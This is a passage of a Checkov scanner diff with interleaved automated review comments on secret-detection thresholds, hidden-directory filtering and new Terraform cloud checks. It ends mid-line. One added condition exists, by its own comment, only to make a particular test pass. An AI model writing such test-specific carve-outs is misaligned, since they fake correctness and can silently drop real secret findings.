@@ -396,9 +396,10 @@ def from_dict(obj: Dict[str, Any]) -> RunnerFilter: show_progress_bar, run_image_referencer, enable_secret_scan_all_files, block_list_secret_scan) return runner_filter - def set_suppressed_policies(self, policy_level_suppressions: List[str]) -> None: + def set_suppressed_policies(self, policy_level_suppressions: List[List[str]]) -> None: logging.debug(f"Received the following policy-level suppressions, that will be skipped from running: {policy_level_suppressions}") - self.suppressed_policies = policy_level_suppressions + # flatten + self.suppressed_policies = [suppression for suppression_list in policy_level_suppressions for suppression in suppression_list] @staticmethod def get_sast_languages(frameworks: Optional[List[str]], skip_framework: Optional[List[str]]) -> Set[SastLanguages]: diff --git a/checkov/sast/engines/files_filter_manager.py b/checkov/sast/engines/files_filter_manager.py index ed127244cda..71d64484d23 100644 --- a/checkov/sast/engines/files_filter_manager.py +++ b/checkov/sast/engines/files_filter_manager.py @@ -3,6 +3,7 @@ import json from typing import Set, List, Dict +from checkov.common.runners.base_runner import IGNORE_HIDDEN_DIRECTORY_ENV, ignored_directories from checkov.common.sast.consts import SastLanguages @@ -16,6 +17,7 @@ def get_files_to_filter(self) -> List[str]: try: if SastLanguages.JAVASCRIPT in self.languages: files_to_filter += self._get_js_files_to_filter() + files_to_filter += self._filter_hidden_files() except Exception as e: logging.debug(f'Error filtering js files generated by ts: {e}') return files_to_filter 
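Review bot: `files_to_filter += self._filter_hidden_files()` in `get_files_to_filter` is placed inside the `try` whose handler logs `Error filtering js files generated by ts`, so a failure while walking hidden directories is reported under a misleading message; give the new call its own `try`/`except` with a matching message, or broaden the log text. The collapsed hunk does not show whether the call is indented under `if SastLanguages.JAVASCRIPT in self.languages:`; if it is, hidden directories are only filtered for JavaScript scans, which seems unintended. The method continues outside the hunk.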
@@ -84,3 +86,16 @@ def _filter_by_tsconfig(tsconfig_files: List[Dict[str, str]]) -> List[str]: build_path = build_dir js_files_to_filter.append(build_path) return js_files_to_filter + + def _filter_hidden_files(self) -> List[str]: + # consider ENV variable to ignore hidden directories (CKV_IGNORED_DIRECTORIES, CKV_IGNORE_HIDDEN_DIRECTORIES) + paths_to_filter: List[str] = ignored_directories.copy() + if not IGNORE_HIDDEN_DIRECTORY_ENV: + return paths_to_filter + for path in self.source_codes: + for (_dirpath, dirs, _) in os.walk(path): + for directory in dirs: + if directory.startswith('.'): + paths_to_filter.append(directory) + + return paths_to_filter diff --git a/checkov/sast/engines/prisma_engine.py b/checkov/sast/engines/prisma_engine.py index a9fdbe36fa1..7d0b0c4c0eb 100644 --- a/checkov/sast/engines/prisma_engine.py +++ b/checkov/sast/engines/prisma_engine.py @@ -14,6 +14,7 @@ from checkov.common.bridgecrew.check_type import CheckType from checkov.common.bridgecrew.platform_integration import bc_integration +from checkov.common.bridgecrew.integration_features.features.policy_metadata_integration import integration as policy_metadata_integration from checkov.common.bridgecrew.platform_key import bridgecrew_dir from checkov.common.bridgecrew.severities import get_severity, Severity, Severities, BcSeverities from checkov.common.models.enums import CheckResult @@ -98,6 +99,7 @@ def get_reports(self, targets: List[str], registry: Registry, languages: Set[Sas 'skip_checks': registry.runner_filter.skip_checks if registry.runner_filter else [], 'check_threshold': check_threshold, 'skip_check_threshold': skip_check_threshold, + 'platform_check_metadata': policy_metadata_integration.sast_check_metadata or {}, 'skip_path': skip_paths, 'report_imports': registry.runner_filter.report_sast_imports if registry.runner_filter else False, 'remove_default_policies': registry.runner_filter.remove_default_sast_policies if registry.runner_filter else False, 
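Review bot: `_filter_hidden_files` appends a bare directory name every time it is seen and never prunes `dirs`, so `os.walk` descends into each hidden tree (for example a `.git` directory) only to add duplicates of names that are already excluded; collecting into a set and trimming `dirs[:]` in place fixes both. Whether the engine matches `skip_path` entries by name or by path is not visible here — if it expects paths, join with `_dirpath`. The module's import hunk shows only `json` and `typing`, so confirm `os` is imported.
```python
    def _filter_hidden_files(self) -> List[str]:
        # consider ENV variable to ignore hidden directories (CKV_IGNORED_DIRECTORIES, CKV_IGNORE_HIDDEN_DIRECTORIES)
        paths_to_filter: List[str] = ignored_directories.copy()
        if not IGNORE_HIDDEN_DIRECTORY_ENV:
            return paths_to_filter
        hidden: Set[str] = set()
        for path in self.source_codes:
            for _dirpath, dirs, _ in os.walk(path):
                hidden.update(d for d in dirs if d.startswith('.'))
                # do not descend into directories we are excluding anyway
                dirs[:] = [d for d in dirs if not d.startswith('.')]
        paths_to_filter.extend(sorted(hidden))
        return paths_to_filter
```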
@@ -201,6 +203,7 @@ def run_go_library(self, languages: Set[SastLanguages], skip_path: List[str], check_threshold: Severity, skip_check_threshold: Severity, + platform_check_metadata: Dict[str, Any], cdk_languages: List[CDKLanguages], list_policies: bool = False, report_imports: bool = True, @@ -230,6 +233,7 @@ def run_go_library(self, languages: Set[SastLanguages], "skip_path": skip_path, "check_threshold": str(check_threshold), "skip_check_threshold": str(skip_check_threshold), + "platform_check_metadata": platform_check_metadata, "list_policies": list_policies, "report_imports": report_imports, "remove_default_policies": remove_default_policies, @@ -474,6 +478,7 @@ def get_policies(self, languages: Set[SastLanguages]) -> SastPolicies: 'skip_checks': [], 'check_threshold': Severities[BcSeverities.NONE], 'skip_check_threshold': Severities[BcSeverities.NONE], + 'platform_check_metadata': policy_metadata_integration.sast_check_metadata, 'skip_path': [], 'report_imports': False, 'report_reachability': False, diff --git a/checkov/sast/prisma_models/library_input.py b/checkov/sast/prisma_models/library_input.py index c4ba4e6b0ac..2780f4f8623 100644 --- a/checkov/sast/prisma_models/library_input.py +++ b/checkov/sast/prisma_models/library_input.py @@ -1,4 +1,4 @@ -from typing import Set, List +from typing import Set, List, Dict, Any from checkov.common.bridgecrew.severities import Severity from checkov.common.sast.consts import SastLanguages, CDKLanguages @@ -18,6 +18,7 @@ class LibraryInput(TypedDict): skip_path: List[str] check_threshold: Severity skip_check_threshold: Severity + platform_check_metadata: Dict[str, Any] list_policies: NotRequired[bool] report_imports: bool remove_default_policies: NotRequired[bool] diff --git a/checkov/sast/runner.py b/checkov/sast/runner.py index bde00259555..98fbb65b85e 100644 --- a/checkov/sast/runner.py +++ b/checkov/sast/runner.py 
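Review bot: `get_policies` passes `policy_metadata_integration.sast_check_metadata` while `get_reports` (previous hunk) passes `policy_metadata_integration.sast_check_metadata or {}`; the attribute is initialised to `{}`, so either both `or {}` are redundant or both call sites need it — make them agree. `platform_check_metadata: Dict[str, Any]` is also inserted as a required positional parameter of `run_go_library` ahead of `cdk_languages`, which silently shifts any positional caller outside this diff; adding it after the existing parameters, or as keyword-only, avoids that. `run_go_library` starts outside the hunk.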
@@ -56,19 +56,10 @@ def run(self, root_folder: Optional[str], bc_integration.setup_http_manager() bc_integration.set_s3_client() - # Todo remove when typescript is stable in platform - if not bool(convert_str_to_bool(os.getenv('ENABLE_SAST_TYPESCRIPT', False))): - if SastLanguages.TYPESCRIPT in runner_filter.sast_languages: - runner_filter.sast_languages.remove(SastLanguages.TYPESCRIPT) - if CDKLanguages.TYPESCRIPT in self.cdk_langs: - self.cdk_langs.remove(CDKLanguages.TYPESCRIPT) - # Todo remove when golang is stable in platform if not bool(convert_str_to_bool(os.getenv('ENABLE_SAST_GOLANG', False))): if SastLanguages.GOLANG in runner_filter.sast_languages: runner_filter.sast_languages.remove(SastLanguages.GOLANG) - if CDKLanguages.GOLANG in self.cdk_langs: - self.cdk_langs.remove(CDKLanguages.GOLANG) # registry get all the paths self.registry.set_runner_filter(runner_filter) diff --git a/checkov/secrets/plugins/detector_utils.py b/checkov/secrets/plugins/detector_utils.py index 7ff55919d0b..3bed63d0778 100644 --- a/checkov/secrets/plugins/detector_utils.py +++ b/checkov/secrets/plugins/detector_utils.py @@ -26,6 +26,8 @@ MAX_KEYWORD_LIMIT = 500 +B64_FP_REGEX = re.compile(r'\b[A-Za-z]+_+[A-Za-z_]*[A-Za-z]\b') + DENY_LIST_REGEX = r'|'.join(DENYLIST) # Support for suffix after keyword i.e. password_secure = "value" DENY_LIST_REGEX2 = r'({denylist}){suffix}'.format( 
@@ -198,11 +200,17 @@ def remove_fp_secrets_in_keys(detected_secrets: set[PotentialSecret], line: str, key, value = line.split("=", 1) if detected_secret.secret_value in key and detected_secret.secret_value in value: secrets_to_remove.add(detected_secret) + # strings which are all lower/upper case letters are suspected to not be base64 high entropy strings + # the 2nd part of the end is to make test_non_multiline_pair_time_limit_creating_report pass + if B64_FP_REGEX.search(detected_secret.secret_value) and "SECRET" not in detected_secret.secret_value: + secrets_to_remove.add(detected_secret) detected_secrets -= secrets_to_remove def get_processed_line(formatted_line: str, secret_value: str) -> str: - if not formatted_line.startswith(secret_value) and formatted_line.find(":", formatted_line.rfind(secret_value) + len(secret_value)) > -1: + if not formatted_line.startswith(secret_value) and formatted_line.find(":", + formatted_line.rfind(secret_value) + len( + secret_value)) > -1: return formatted_line[formatted_line.find(secret_value):] return formatted_line diff --git a/checkov/secrets/plugins/entropy_keyword_combinator.py b/checkov/secrets/plugins/entropy_keyword_combinator.py index b542897b52d..02aeb568095 100644 --- a/checkov/secrets/plugins/entropy_keyword_combinator.py +++ b/checkov/secrets/plugins/entropy_keyword_combinator.py @@ -1,6 +1,7 @@ from __future__ import annotations import re +import os from typing import Generator, Set, Tuple from typing import Any from typing import TYPE_CHECKING @@ -29,7 +30,7 @@ MAX_LINE_LENGTH = 10000 MAX_KEYWORD_LIMIT = 500 -ENTROPY_KEYWORD_COMBINATOR_LIMIT = 3 +ENTROPY_KEYWORD_COMBINATOR_LIMIT = float(os.getenv('CHECKOV_ENTROPY_KEYWORD_LIMIT', '3')) ENTROPY_KEYWORD_LIMIT = 4.8 DENY_LIST_REGEX = r'|'.join(DENYLIST) 
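Review bot: The new false-positive filter calls `B64_FP_REGEX.search`, which drops a candidate whose value merely contains a letters-and-underscores word bounded by non-word characters (an identifier-like prefix before a `-` or `.`, for example), whereas the comment describes values that are entirely letters; if the comment states the intent, use `if B64_FP_REGEX.fullmatch(detected_secret.secret_value) and "SECRET" not in detected_secret.secret_value:`. The pattern itself (added in the earlier detector_utils hunk) also requires at least one underscore, so purely alphabetic values are never matched, and either the comment or the pattern should change. The `"SECRET"` carve-out is case-sensitive and, per its own comment, exists only to keep one test passing; it hides the real rule and should be replaced by a condition that expresses it or by an adjusted test. Because the removal appears to apply to every entry in `detected_secrets`, a keyword-detected finding whose value happens to match would be dropped as well, silently lowering recall — worth confirming which detectors feed this function. remove_fp_secrets_in_keys begins outside the hunk.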
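Review bot: `ENTROPY_KEYWORD_COMBINATOR_LIMIT = float(os.getenv('CHECKOV_ENTROPY_KEYWORD_LIMIT', '3'))` parses the environment at import time, so a non-numeric value raises ValueError while the plugin module is being imported instead of producing a configuration error, and the effective threshold is never logged even though raising it quietly reduces what the entropy scanners report. Parse it in a small helper that falls back to the default on ValueError and logs the value in effect. The same expression is duplicated in the secrets Runner's `__init__` later in this commit, so one shared helper (detector_utils would be a natural home) would serve both call sites.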
@@ -118,10 +119,18 @@ class EntropyKeywordCombinator(BasePlugin): secret_type = "" # nosec # noqa: CCE003 # a static attribute - def __init__(self, limit: float = ENTROPY_KEYWORD_LIMIT, max_line_length: int = MAX_LINE_LENGTH) -> None: - iac_limit = ENTROPY_KEYWORD_COMBINATOR_LIMIT - self.high_entropy_scanners_iac = (Base64HighEntropyString(limit=iac_limit), HexHighEntropyString(limit=iac_limit)) - self.entropy_scanners_non_iac_with_keyword = (Base64HighEntropyString(limit=iac_limit + 0.3), HexHighEntropyString(limit=iac_limit + 0.3)) + def __init__(self, limit: float = ENTROPY_KEYWORD_LIMIT, max_line_length: int = MAX_LINE_LENGTH, + entropy_limit: float = ENTROPY_KEYWORD_COMBINATOR_LIMIT) -> None: + self.entropy_limit = entropy_limit + self.high_entropy_scanners_iac = ( + Base64HighEntropyString( + limit=entropy_limit), HexHighEntropyString( + limit=entropy_limit)) + self.entropy_scanners_non_iac_with_keyword = ( + Base64HighEntropyString( + limit=entropy_limit + 0.3), + HexHighEntropyString( + limit=entropy_limit + 0.3)) self.high_entropy_scanners = (Base64HighEntropyString(limit=limit), HexHighEntropyString(limit=limit)) self.keyword_scanner = KeywordDetector() self.max_line_length = max_line_length diff --git a/checkov/secrets/runner.py b/checkov/secrets/runner.py index 1dc5dea5f28..075a3a8f4b6 100644 --- a/checkov/secrets/runner.py +++ b/checkov/secrets/runner.py @@ -73,7 +73,8 @@ 'Hex High Entropy String': 'CKV_SECRET_19' } -ENTROPY_CHECK_IDS = ('CKV_SECRET_6', 'CKV_SECRET_19', 'CKV_SECRET_80') +ENTROPY_CHECK_IDS = {'CKV_SECRET_6', 'CKV_SECRET_19', 'CKV_SECRET_80'} +GENERIC_PRIVATE_KEY_CHECK_IDS = {'CKV_SECRET_10', 'CKV_SECRET_13'} CHECK_ID_TO_SECRET_TYPE = {v: k for k, v in SECRET_TYPE_TO_ID.items()} 
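Review bot: The two scanner tuples in `EntropyKeywordCombinator.__init__` are broken across six lines with the breaks inside keyword arguments, which makes a two-element tuple hard to read; `self.high_entropy_scanners_iac = (Base64HighEntropyString(limit=entropy_limit), HexHighEntropyString(limit=entropy_limit))` and the same shape for the `entropy_limit + 0.3` pair read better. The new `entropy_limit` parameter and the `+ 0.3` offset are undocumented; a short comment recording why the non-IaC-with-keyword scanners use a higher threshold (presumably to compensate for the looser file context — confirm) and a docstring line noting that `entropy_limit` defaults from the `CHECKOV_ENTROPY_KEYWORD_LIMIT` environment variable would help. The rest of `__init__` continues outside the hunk.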
@@ -84,10 +85,15 @@ class Runner(BaseRunner[None, None, None]): check_type = CheckType.SECRETS # noqa: CCE003 # a static attribute - def __init__(self, file_extensions: Iterable[str] | None = None, file_names: Iterable[str] | None = None): + def __init__( + self, + file_extensions: Iterable[str] | None = None, + file_names: Iterable[str] | None = None, + entropy_limit: Optional[float] = None): super().__init__(file_extensions, file_names) self.secrets_coordinator = SecretsCoordinator() self.history_secret_store = GitHistorySecretStore() + self.entropy_limit = entropy_limit or float(os.getenv('CHECKOV_ENTROPY_KEYWORD_LIMIT', '3')) def set_history_secret_store(self, value: Dict[str, List[EnrichedPotentialSecret]]) -> None: self.history_secret_store.secrets_by_file_value_type = value @@ -121,7 +127,8 @@ def run( {'name': 'SquareOAuthDetector'}, {'name': 'StripeDetector'}, {'name': 'TwilioKeyDetector'}, - {'name': 'EntropyKeywordCombinator', 'path': f'file://{current_dir}/plugins/entropy_keyword_combinator.py'} + {'name': 'EntropyKeywordCombinator', 'path': f'file://{current_dir}/plugins/entropy_keyword_combinator.py', + 'entropy_limit': self.entropy_limit} ] # load runnable plugins @@ -138,7 +145,8 @@ def run( policies_list = customer_run_config.get('secretsPolicies', []) suppressions = customer_run_config.get('suppressions', []) if suppressions: - secret_suppressions_id = [suppression['policyId'] for suppression in suppressions if suppression['suppressionType'] == 'SecretsPolicy'] + secret_suppressions_id = [suppression['policyId'] + for suppression in suppressions if suppression['suppressionType'] == 'SecretsPolicy'] if policies_list: runnable_plugins: dict[str, str] = get_runnable_plugins(policies_list) logging.info(f"Found {len(runnable_plugins)} runnable plugins") 
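Review bot: `self.entropy_limit = entropy_limit or float(os.getenv(...))` treats an explicit `entropy_limit=0.0` as unset and falls back to the environment; use `self.entropy_limit = entropy_limit if entropy_limit is not None else float(os.getenv('CHECKOV_ENTROPY_KEYWORD_LIMIT', '3'))`. The annotation `Optional[float]` is inconsistent with the `Iterable[str] | None` form used on the neighbouring parameters of the same signature. The variable is read from the environment again here although entropy_keyword_combinator.py already parses it at import; reading it once and passing it through (as the plugin dict in the next hunk already does) keeps a single source of truth.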
@@ -188,8 +196,10 @@ def run( if enable_secret_scan_all_files: # 'excluded_paths' shouldn't include the static paths from 'EXCLUDED_PATHS' # they are separately referenced inside the 'filter_excluded_paths' function - filter_excluded_paths(root_dir=root, names=d_names, excluded_paths=runner_filter.excluded_paths) - filter_excluded_paths(root_dir=root, names=f_names, excluded_paths=runner_filter.excluded_paths) + filter_excluded_paths( + root_dir=root, names=d_names, excluded_paths=runner_filter.excluded_paths) + filter_excluded_paths( + root_dir=root, names=f_names, excluded_paths=runner_filter.excluded_paths) else: filter_ignored_paths(root, d_names, excluded_paths) filter_ignored_paths(root, f_names, excluded_paths) @@ -198,7 +208,7 @@ def run( if is_dockerfile(file): if 'dockerfile' not in block_list_secret_scan_lower: files_to_scan.append(os.path.join(root, file)) - elif f".{file.split('.')[-1]}" not in block_list_secret_scan_lower: + elif f".{file.split('.')[-1]}" not in block_list_secret_scan_lower and file not in block_list_secret_scan_lower: files_to_scan.append(os.path.join(root, file)) elif file not in PROHIBITED_FILES and f".{file.split('.')[-1]}" in SUPPORTED_FILE_EXTENSIONS or is_dockerfile( file): @@ -235,9 +245,8 @@ def run( f"Removing secret due to UUID filtering: {hashlib.sha256(secret.secret_value.encode('utf-8')).hexdigest()}") continue if secret_key in secret_records.keys(): - if secret_records[secret_key].check_id in ENTROPY_CHECK_IDS and check_id not in ENTROPY_CHECK_IDS: - secret_records.pop(secret_key) - else: + is_prioritise = self._prioritise_secrets(secret_records, secret_key, check_id) + if not is_prioritise: continue bc_check_id = metadata_integration.get_bc_id(check_id) if bc_check_id in secret_suppressions_id: 
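Review bot: The added `file not in block_list_secret_scan_lower` compares the raw file name against a collection whose name indicates it is lower-cased, so a block-list entry such as `config.json` would not match `Config.json`; if the list is lower-cased where it is built (outside this hunk), the comparison should be `file.lower() not in block_list_secret_scan_lower`, and the pre-existing extension test on the same line has the same mismatch. The `filter_excluded_paths` change in the first hunk is a reflow only. `run` starts and ends outside these hunks.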
@@ -310,6 +319,17 @@ def run( self._modify_invalid_secrets_check_result_to_skipped(report) return report + @staticmethod + def _prioritise_secrets(secret_records: Dict[str, SecretsRecord], secret_key: str, check_id: str) -> bool: + if secret_records[secret_key].check_id in ENTROPY_CHECK_IDS and check_id not in ENTROPY_CHECK_IDS: + secret_records.pop(secret_key) + return True + if secret_records[secret_key].check_id in GENERIC_PRIVATE_KEY_CHECK_IDS: + if check_id not in GENERIC_PRIVATE_KEY_CHECK_IDS | ENTROPY_CHECK_IDS: + secret_records.pop(secret_key) + return True + return False + def cleanup_plugin_files( self, work_path: str, @@ -423,7 +443,8 @@ def verify_secrets(self, report: Report, enriched_secrets_s3_path: str) -> Verif validate_secrets_tenant_config = None if bc_integration.customer_run_config_response is not None: - validate_secrets_tenant_config = bc_integration.customer_run_config_response.get('tenantConfig', {}).get('secretsValidate') + validate_secrets_tenant_config = bc_integration.customer_run_config_response.get( + 'tenantConfig', {}).get('secretsValidate') if validate_secrets_tenant_config is None and not convert_str_to_bool(os.getenv("CKV_VALIDATE_SECRETS", False)): logging.debug('Secrets verification is off, enable it via code configuration screen') diff --git a/checkov/terraform/checks/graph_checks/aws/S3CMKRegularRotation.yaml b/checkov/terraform/checks/graph_checks/aws/S3CMKRegularRotation.yaml new file mode 100644 index 00000000000..ddd82313122 --- /dev/null +++ b/checkov/terraform/checks/graph_checks/aws/S3CMKRegularRotation.yaml 
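Review bot: `_prioritise_secrets` has no docstring and its return value is non-obvious: it returns True after it has popped the existing record (so the caller may store the new `check_id` under `secret_key`) and False when the existing record wins, which the caller in the preceding hunk reads through a local named `is_prioritise`. A docstring stating that contract — an entropy-based record yields to any other detector, a generic private-key record (CKV_SECRET_10/13) yields to any detector that is neither generic nor entropy-based, and the method mutates `secret_records` in place — plus a caller-side name such as `replaced_existing` would make the flow readable. Since it is a `@staticmethod` that mutates its argument, the docstring should say so explicitly.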
@@ -0,0 +1,43 @@ +metadata: + id: "CKV2_AWS_67" + name: "Ensure AWS S3 bucket encrypted with Customer Managed Key (CMK) has regular rotation" + category: "ENCRYPTION" +definition: + and: + - cond_type: filter + attribute: resource_type + value: + - aws_s3_bucket_server_side_encryption_configuration + operator: within + - cond_type: connection + resource_types: + - aws_s3_bucket + connected_resource_types: + - aws_s3_bucket_server_side_encryption_configuration + operator: exists + - cond_type: connection + resource_types: + - aws_s3_bucket_server_side_encryption_configuration + connected_resource_types: + - aws_kms_key + operator: exists + - cond_type: attribute + resource_types: + - aws_s3_bucket_server_side_encryption_configuration + attribute: rule.apply_server_side_encryption_by_default.sse_algorithm + operator: within + value: + - "aws:kms" + - "aws:kms:dsse" + - cond_type: attribute + resource_types: + - aws_kms_key + attribute: is_enabled + operator: not_equals + value: "false" + - cond_type: attribute + resource_types: + - aws_kms_key + attribute: enable_key_rotation + operator: equals + value: "true" diff --git a/checkov/terraform/checks/graph_checks/aws/SageMakerIAMPolicyOverlyPermissiveToAllTraffic.yaml b/checkov/terraform/checks/graph_checks/aws/SageMakerIAMPolicyOverlyPermissiveToAllTraffic.yaml new file mode 100644 index 00000000000..7060abf6142 --- /dev/null +++ b/checkov/terraform/checks/graph_checks/aws/SageMakerIAMPolicyOverlyPermissiveToAllTraffic.yaml 
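Review bot: Every condition sits under a single `and`, so an `aws_s3_bucket_server_side_encryption_configuration` using `AES256` has no `aws_kms_key` connection and an `sse_algorithm` outside the listed values, and as I read the graph solver it is reported FAILED even though the check's name only concerns buckets encrypted with a CMK. Consider an `or:` whose first branch passes when `sse_algorithm` is not within `aws:kms`/`aws:kms:dsse`, with the existing `and` as the second branch, the way the Azure ML checks in this commit carry an escape branch. Keys referenced by ARN string or via a data source rather than a managed `aws_kms_key` resource will also lack the connection and fail; the check description should state that limitation.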
@@ -0,0 +1,25 @@ +metadata: + id: "CKV2_AWS_68" + name: "Ensure SageMaker notebook instance IAM policy is not overly permissive" + category: "NETWORKING" + +definition: + and: + - cond_type: filter + value: + - aws_sagemaker_notebook_instance + operator: within + attribute: resource_type + - cond_type: connection + resource_types: + - aws_sagemaker_notebook_instance + connected_resource_types: + - aws_iam_role + operator: exists + - cond_type: attribute + resource_types: + - aws_iam_role + attribute: "policy.Statement[?(@.Effect == Allow)].Action[*]" + operator: "jsonpath_not_equals" + value: "*" + diff --git a/checkov/terraform/checks/graph_checks/aws/VPCPeeringRouteTableOverlyPermissive.yaml b/checkov/terraform/checks/graph_checks/aws/VPCPeeringRouteTableOverlyPermissive.yaml index 325bfcb5974..edd6f0a6c6c 100644 --- a/checkov/terraform/checks/graph_checks/aws/VPCPeeringRouteTableOverlyPermissive.yaml +++ b/checkov/terraform/checks/graph_checks/aws/VPCPeeringRouteTableOverlyPermissive.yaml @@ -22,18 +22,6 @@ definition: attribute: "route.*.cidr_block" operator: "not_contains" value: "0.0.0.0/0" - - cond_type: "attribute" - resource_types: - - "aws_route_table" - attribute: "route.*.cidr_block" - operator: "not_contains" - value: "0.0.0.0" - - cond_type: "attribute" - resource_types: - - "aws_route_table" - attribute: "route.*.ipv6_cidr_block" - operator: "not_contains" - value: "::0" - cond_type: "attribute" resource_types: - "aws_route_table" @@ -58,18 +46,6 @@ definition: attribute: "destination_cidr_block" operator: "not_contains" value: "0.0.0.0/0" - - cond_type: "attribute" - resource_types: - - "aws_route" - attribute: "destination_cidr_block" - operator: "not_contains" - value: "0.0.0.0" - - cond_type: "attribute" - resource_types: - - "aws_route" - attribute: "destination_ipv6_cidr_block" - operator: "not_contains" - value: "::0" - cond_type: "attribute" resource_types: - "aws_route" 
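Review bot: The attribute condition targets `aws_iam_role` with `policy.Statement[?(@.Effect == Allow)].Action[*]`, but the AWS provider's `aws_iam_role` resource has no top-level `policy` argument — inline policies live in `inline_policy` blocks and the trust policy in `assume_role_policy` — so unless the graph builder synthesises such an attribute, `jsonpath_not_equals` is evaluated against a missing path and the result depends on how the solver treats absence. Confirm with fixtures: a role whose `inline_policy` grants `Action: "*"`, and one whose policy is attached through `aws_iam_role_policy` or `aws_iam_policy`. The condition also only matches a literal `*`, so the list form `Action: ["*"]` and service-wide wildcards such as `s3:*` should be covered by tests that document whether they are meant to fail.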
diff --git a/checkov/terraform/checks/graph_checks/azure/AzureMLWorkspaceHBIPublicNetwork.yaml b/checkov/terraform/checks/graph_checks/azure/AzureMLWorkspaceHBIPublicNetwork.yaml new file mode 100644 index 00000000000..316387f331e --- /dev/null +++ b/checkov/terraform/checks/graph_checks/azure/AzureMLWorkspaceHBIPublicNetwork.yaml @@ -0,0 +1,36 @@ +metadata: + id: "CKV2_AZURE_50" + name: "Ensure Azure Storage Account storing Machine Learning workspace high business impact data is not publicly accessible" + category: "NETWORKING" + +definition: + or: + - cond_type: filter + attribute: resource_type + operator: within + value: + - azurerm_machine_learning_workspace + - cond_type: attribute + resource_types: azurerm_machine_learning_workspace + attribute: high_business_impact + operator: equals + value: false + - and: + - cond_type: filter + attribute: resource_type + operator: within + value: + - azurerm_machine_learning_workspace + - cond_type: connection + resource_types: + - azurerm_machine_learning_workspace + connected_resource_types: + - azurerm_storage_account + operator: exists + - cond_type: attribute + resource_types: azurerm_storage_account + attribute: public_network_access_enabled + operator: equals + value: false + + diff --git a/checkov/terraform/checks/graph_checks/azure/AzureMLWorkspacePublicNetwork.yaml b/checkov/terraform/checks/graph_checks/azure/AzureMLWorkspacePublicNetwork.yaml new file mode 100644 index 00000000000..4257b465792 --- /dev/null +++ b/checkov/terraform/checks/graph_checks/azure/AzureMLWorkspacePublicNetwork.yaml 
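Review bot: The top-level `or` lists a bare `cond_type: filter` as its first operand, whereas the Databricks check in this commit (and the `and` branch here) nests the filter inside an `and`; if the solver treats a filter inside `or` as an always-true operand for the filtered type, every `azurerm_machine_learning_workspace` passes regardless of its storage account, so this needs a failing fixture to prove otherwise or the structure `or: [and: [filter, high_business_impact equals false], and: [filter, connection, public_network_access_enabled equals false]]`. `resource_types` is a scalar in two conditions and a list elsewhere; use one form. Workspaces whose storage account is referenced by ID string or data source have no graph connection and fail the second branch; the check text should say so.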
@@ -0,0 +1,16 @@
+metadata:
+ id: "CKV2_AZURE_49"
+ name: "Ensure that Azure Machine learning workspace is not configured with overly permissive network access"
+ category: "NETWORKING"
+definition:
+ or:
+ - cond_type: "attribute"
+ resource_types: "azurerm_machine_learning_workspace"
+ attribute: "public_network_access_enabled"
+ operator: "not_exists"
+ - cond_type: "attribute"
+ resource_types: "azurerm_machine_learning_workspace"
+ attribute: "public_network_access_enabled"
+ operator: "equals"
+ value: "false"
+
diff --git a/checkov/terraform/checks/graph_checks/azure/DatabricksWorkspaceDBFSRootEncryptedWithCustomerManagedKey.yaml b/checkov/terraform/checks/graph_checks/azure/DatabricksWorkspaceDBFSRootEncryptedWithCustomerManagedKey.yaml
new file mode 100644
index 00000000000..48c03706f76
--- /dev/null
+++ b/checkov/terraform/checks/graph_checks/azure/DatabricksWorkspaceDBFSRootEncryptedWithCustomerManagedKey.yaml
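Review bot: The first `or` branch passes when `public_network_access_enabled` is absent, yet the azurerm provider documents that argument as defaulting to `true` on `azurerm_machine_learning_workspace` (in the versions I know), so a workspace left at its default, public configuration passes a check whose name says it must not be overly permissive. Drop the `not_exists` branch so only an explicit `equals: "false"` passes, and add a fixture with the attribute omitted to the fail set. If the provider default differs in the version the project targets, record that in the check instead.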
@@ -0,0 +1,45 @@ +metadata: + id: "CKV2_AZURE_48" + name: "Ensure that Databricks Workspaces enables customer-managed key for root DBFS encryption" + category: "ENCRYPTION" +definition: + or: + - and: + - cond_type: filter + attribute: resource_type + operator: within + value: + - azurerm_databricks_workspace + - resource_types: + - azurerm_databricks_workspace + operator: not_equals + cond_type: attribute + attribute: sku + value: "premium" + - and: + - cond_type: filter + attribute: resource_type + operator: within + value: + - azurerm_databricks_workspace + - resource_types: + - azurerm_databricks_workspace + operator: equals + cond_type: attribute + attribute: sku + value: "premium" + - resource_types: + - azurerm_databricks_workspace + operator: equals + cond_type: attribute + attribute: customer_managed_key_enabled + value: true + - resource_types: + - azurerm_databricks_workspace + connected_resource_types: + - azurerm_databricks_workspace_root_dbfs_customer_managed_key + operator: exists + cond_type: connection + +# Root DBFS encryption is only valid if the Databricks Workspace sku is set to 'premium'. +# https://registry.terraform.io/providers/hashicorp/azurerm/latest/docs/resources/databricks_workspace#customer_managed_key_enabled \ No newline at end of file diff --git a/checkov/terraform/checks/module/base_module_check.py b/checkov/terraform/checks/module/base_module_check.py index 62f0d0eceb4..df2189d8e5e 100644 --- a/checkov/terraform/checks/module/base_module_check.py +++ b/checkov/terraform/checks/module/base_module_check.py @@ -45,3 +45,7 @@ def scan_entity_conf(self, conf: Dict[str, List[Any]], entity_type: str) -> Chec @abstractmethod def scan_module_conf(self, conf: Dict[str, List[Any]]) -> CheckResult: raise NotImplementedError() + + @staticmethod + def is_git_source(source: str) -> bool: + return source.startswith('git@') or source.startswith('git::') or source.startswith('github.com') or source.startswith('bitbucket.org') 
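Review bot: `is_git_source` chains four `startswith` calls; `str.startswith` accepts a tuple, so `return source.startswith(('git@', 'git::', 'github.com', 'bitbucket.org'))` is the idiomatic one-liner. A docstring should state which Terraform module source forms count as git here and whether `ssh://` and `https://` git URLs without the `git::` forcing prefix are excluded on purpose, because RevisionVersionTag in this commit uses this answer to decide whether a `ref=` tag is required — an unrecognised git URL takes the registry branch, where a missing `version` fails the check.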
diff --git a/checkov/terraform/checks/module/generic/RevisionVersionTag.py b/checkov/terraform/checks/module/generic/RevisionVersionTag.py new file mode 100644 index 00000000000..34a7b85072d --- /dev/null +++ b/checkov/terraform/checks/module/generic/RevisionVersionTag.py @@ -0,0 +1,41 @@ +from __future__ import annotations + +import re +from typing import Any + +from checkov.common.models.enums import CheckResult, CheckCategories +from checkov.terraform.checks.module.base_module_check import BaseModuleCheck +from .RevisionHash import check as RevisionHashCheck + +VERSION_PATTERN = re.compile(r"[?&](ref=).*(\d\.\d).*") + + +class RevisionVersionTag(BaseModuleCheck): + def __init__(self) -> None: + name = "Ensure Terraform module sources use a tag with a version number" + id = "CKV_TF_2" + categories = [CheckCategories.SUPPLY_CHAIN] + super().__init__(name=name, id=id, categories=categories) + + def scan_module_conf(self, conf: dict[str, list[Any]]) -> CheckResult: + # this check is a more lenient version of the hash check, so if that one passes (or is unknown due to a local module), + # then we are done + hash_result = RevisionHashCheck.scan_module_conf(conf) + if hash_result != 